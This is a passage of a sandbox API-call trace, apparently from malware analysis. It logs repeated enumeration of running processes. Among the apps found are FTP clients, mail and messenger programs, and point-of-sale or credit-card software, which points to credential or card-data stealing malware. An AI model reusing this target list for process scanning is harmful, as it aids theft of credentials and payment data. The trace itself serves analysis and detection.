| out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0251.497] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0251.499] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0251.500] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0251.501] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0251.503] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0251.504] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0251.505] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0251.507] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0251.508] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0251.510] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0251.530] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0251.531] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0251.532] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0251.534] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0251.535] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0251.537] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0251.539] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0251.540] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0251.544] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0251.546] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0251.548] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0251.549] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0251.551] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0251.553] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0251.554] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0251.556] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0251.558] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0251.561] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0251.563] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0251.564] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0251.566] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0251.567] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0251.569] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0251.570] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0251.572] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0251.623] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0251.625] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0251.626] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0251.628] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0251.629] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0251.631] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0251.632] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0251.634] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0251.636] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0251.639] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0251.641] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0251.642] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0251.644] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0251.645] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0251.646] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0251.648] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0251.649] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0251.654] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0251.655] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0251.657] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.659] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.660] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.661] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0251.663] CloseHandle (hObject=0x1018) returned 1 [0251.663] Sleep (dwMilliseconds=0x64) [0251.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0251.970] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.972] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.973] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.974] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.976] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.977] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.978] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.980] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.983] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.984] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.985] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.987] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.988] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.989] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.991] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.992] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.069] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.071] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.073] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.075] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0252.076] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0252.078] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.079] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0252.082] 